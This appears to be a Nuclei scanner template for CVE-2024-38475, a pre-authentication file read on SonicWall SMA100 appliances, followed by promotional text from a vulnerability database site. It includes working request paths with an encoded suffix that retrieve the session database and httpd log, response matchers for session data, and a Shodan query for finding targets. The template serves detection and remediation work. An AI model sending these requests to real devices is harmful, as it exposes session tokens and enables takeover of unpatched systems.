id: CVE-2024-38475
info:
name: Sonicwall - Pre-Authentication Arbitrary File Read
author: shaikhyaser
severity: critical
description: |
Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected. Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.
impact: |
Unauthenticated attackers can read arbitrary files from the SonicWall SMA100 filesystem including configuration files, logs, and sensitive data, potentially leading to further exploitation or complete system compromise.
remediation: |
Upgrade to the latest patched version of SonicWall SMA100 or apply vendor-provided security updates.
reference:
- https://github.com/watchtowrlabs/watchTowr-vs-SonicWall-PreAuth-RCE-Chain/blob/main/watchTowr-vs-SonicWall-PreAuth-RCE-Chain.py
- https://labs.watchtowr.com/sonicboom-from-stolen-tokens-to-remote-shells-sonicwall-sma100-cve-2023-44221-cve-2024-38475/
- https://nvd.nist.gov/vuln/detail/CVE-2024-38475
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 9.1
cve-id: CVE-2024-38475
cwe-id: CWE-116
epss-score: 0.99957
epss-percentile: 0.99974
metadata:
verified: true
max-request: 1
shodan-query: html:"SonicWall" html:"SMA"
tags: cve,cve2024,sonicwal,sma-100,lfi,kev,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/tmp/temp.db%3f.1.1.1.1a-1.css"
- "{{BaseURL}}/mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css"
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains_all(body, "SQLite format","sessionId")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains_all(body, "mod_antiloris","[pid")'
- 'contains(content_type, "text/plain")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100886070a9c55dbc5c728503d06e8ed07a96d370ef9f4193b21189fd107caac8e80220184199148af02ae61534b322cce4a3cdfc63117149e5441fcb104476674a72fe:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation